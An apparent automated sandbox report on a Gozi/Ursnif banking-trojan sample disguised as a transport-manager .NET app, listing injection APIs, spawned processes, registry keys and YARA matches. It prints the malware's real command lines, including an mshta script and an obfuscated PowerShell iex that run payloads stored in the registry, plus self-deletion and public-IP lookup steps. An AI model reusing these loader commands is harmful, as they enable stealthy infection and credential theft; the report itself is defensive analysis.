Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F08C10 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	8_2_03F08C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F10B30 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	8_2_03F10B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F10A74 NtReadVirtualMemory,	8_2_03F10A74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F2389B NtGetContextThread,RtlNtStatusToDosError,	8_2_03F2389B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0483A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	8_2_03F0483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F03F97 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	8_2_03F03F97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F17EEF NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	8_2_03F17EEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F01641 memset,NtQueryInformationProcess,	8_2_03F01641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0155B NtQuerySystemInformation,RtlNtStatusToDosError,	8_2_03F0155B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1E4D5 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	8_2_03F1E4D5
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E69994 NtReadVirtualMemory,	28_2_00E69994
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E56140 NtAllocateVirtualMemory,	28_2_00E56140
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E51B84 NtQueryInformationProcess,	28_2_00E51B84
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6AC44 NtQueryInformationToken,NtQueryInformationToken,NtClose,	28_2_00E6AC44
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E73C1C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	28_2_00E73C1C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E7B58C NtSetContextThread,NtUnmapViewOfSection,NtClose,	28_2_00E7B58C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E70E70 NtMapViewOfSection,	28_2_00E70E70
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E5E614 NtCreateSection,	28_2_00E5E614
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E51FBC NtWriteVirtualMemory,	28_2_00E51FBC
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E5FF60 RtlAllocateHeap,NtQueryInformationProcess,	28_2_00E5FF60
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E8F01F NtProtectVirtualMemory,NtProtectVirtualMemory,	28_2_00E8F01F
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA81B84 NtQueryInformationProcess,	36_2_0000020FDEA81B84
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9AC44 NtQueryInformationToken,NtQueryInformationToken,NtClose,	36_2_0000020FDEA9AC44
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEABF00B NtProtectVirtualMemory,NtProtectVirtualMemory,	36_2_0000020FDEABF00B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0303D274 NtQueryInformationProcess,	47_2_0303D274
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03051AE3 memset,CreateMutexA,CloseHandle,GetUserNameA,RtlAllocateHeap,NtQueryInformationProcess,OpenProcess,CloseHandle,memcpy,RtlAllocateHeap,OpenEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	47_2_03051AE3
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_030529E0 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	47_2_030529E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03047523 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	47_2_03047523
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03031641 memset,NtQueryInformationProcess,	47_2_03031641
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03047EEF NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	47_2_03047EEF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0303155B NtQuerySystemInformation,RtlNtStatusToDosError,	47_2_0303155B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0304E4D5 OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	47_2_0304E4D5

Sample file is different than original file name gathered from version info

Source: gozi.exe	Binary or memory string: OriginalFilename vs gozi.exe
Source: gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameAdMunch.exe6 vs gozi.exe
Source: gozi.exe, 00000002.00000002.328151243.0000000004199000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameEventManager.dll: vs gozi.exe

Source: gozi.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: gozi.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\gozi.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gozi.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winEXE@35/22@10/2

Source: C:\Windows\System32\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: gozi.exe	Virustotal: Detection: 38%
Source: gozi.exe	Metadefender: Detection: 40%
Source: gozi.exe	ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\gozi.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\gozi.exe "C:\Users\user\Desktop\gozi.exe"
Source: C:\Users\user\Desktop\gozi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djqr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djqr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC8CA7551FEF4543EEA6FB885A13AF16EB.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8712.tmp" "c:\Users\user\AppData\Local\Temp\CSC31C5CF8C116B47DEB51FEE2BA7A26AB5.TMP"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\3B0F.bi1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\3B0F.bi1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gozi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC8CA7551FEF4543EEA6FB885A13AF16EB.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8712.tmp" "c:\Users\user\AppData\Local\Temp\CSC31C5CF8C116B47DEB51FEE2BA7A26AB5.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\3B0F.bi1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\3B0F.bi1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdpkmtso.umo.ps1

Jump to behavior

Source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp	Binary or memory string: INSERT INTO `users` (`Login`, `Password`, `Role`) VALUES(@uLogin, @uPassword, @uRole);
Source: gozi.exe	Binary or memory string: SELECT * FROM `transport`;
Source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp	Binary or memory string: INSERT INTO `transport` (`Type`, `Consumption`) VALUES(@uType, @uCons);
Source: gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp	Binary or memory string: INSERT INTO `waybills` (`DriverId`, `TransportId`, `Distance`, `Price`, `Date`) VALUES(@DriverId, @TransportId, @Distance, @Price, @Date);
Source: gozi.exe	Binary or memory string: SELECT * FROM `drivers` WHERE `Login` = @uLogin;
Source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp	Binary or memory string: SELECT * FROM `users` WHERE `Login` = @uLogin AND `Password` = @uPassword;
Source: gozi.exe	Binary or memory string: SELECT * FROM `drivers` WHERE `Id` = @Id;
Source: gozi.exe	Binary or memory string: SELECT * FROM `transport` WHERE `Id` = @Id;
Source: gozi.exe	Binary or memory string: SELECT * FROM `waybills`;

Source: C:\Users\user\Desktop\gozi.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_010A1141 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

8_2_010A1141

Source: C:\Windows\System32\control.exe

Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4292:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5656:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_01
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{C2944618-39CD-4415-D316-7DB8B7AA016C}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4580:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\{C68D421A-6D0A-E8E8-275A-F19C4B2EB590}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{6E68996D-F514-D0A1-EF82-F90493D63D78}
Source: C:\Windows\SysWOW64\cmd.exe	Mutant created: \Sessions\1\BaseNamedObjects\{3AB6673A-5150-7C4D-AB0E-15700F2219A4}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5400:120:WilError_01
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{22921B96-19EB-A4D9-B376-5D18970AE1CC}

Source: gozi.exe, transport_manager/MainPage.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.0.gozi.exe.e10000.0.unpack, transport_manager/MainPage.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.gozi.exe.e10000.0.unpack, transport_manager/MainPage.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Users\user\Desktop\gozi.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\gozi.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: gozi.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: gozi.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source: gozi.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdbXP source: powershell.exe, 00000016.00000002.586031203.000002033C29E000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdb source: powershell.exe, 00000016.00000002.585762448.000002033C236000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\New folder\bin\Debug\SLN\transport-manager\obj\Debug\transport-manager.pdb source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdbXP source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
Source:	Binary string: EventManager.pdb source: gozi.exe, 00000002.00000002.328151243.0000000004199000.00000004.00000001.sdmp
Source:	Binary string: Local\{6FD9BC09-0238-7997-8413-56BDF8F7EA41}n.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Source: gozi.exe, transport_manager/MainPage.cs	.Net Code: MainPage_Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.gozi.exe.e10000.0.unpack, transport_manager/MainPage.cs	.Net Code: MainPage_Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.gozi.exe.e10000.0.unpack, transport_manager/MainPage.cs	.Net Code: MainPage_Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010AB72E push ecx; ret	8_2_010AB734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A7F4F push ecx; ret	8_2_010A7F5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A7BE0 push ecx; ret	8_2_010A7BE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010AB804 push 00000055h; iretd	8_2_010AB808
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010AB6BE push ebp; retf	8_2_010AB6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F2541F push ecx; ret	8_2_03F2542F
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E772FD push 3B000001h; retf	28_2_00E77302
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA72FD push 3B000001h; retf	36_2_0000020FDEAA7302
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03055070 push ecx; ret	47_2_03055079
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03053D42 push ss; ret	47_2_03053D43
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0305541F push ecx; ret	47_2_0305542F

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_004012E6 LoadLibraryA,GetProcAddress,

8_2_004012E6

Binary contains a suspicious time stamp

Source: gozi.exe

Static PE information: 0xBF44DD64 [Tue Sep 8 18:09:40 2071 UTC]

Compiles C# or VB.Net code

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline	Jump to behavior

Source: initial sample

Static PE information: section name: .text entropy: 7.33101766252

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\5n300s0s.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\hscan34n.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672226246.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671882459.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392591901.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671987567.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392517903.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672047552.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392607938.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671936053.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473486452.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.540930276.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392570642.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672143247.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473394409.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541170125.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473504593.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
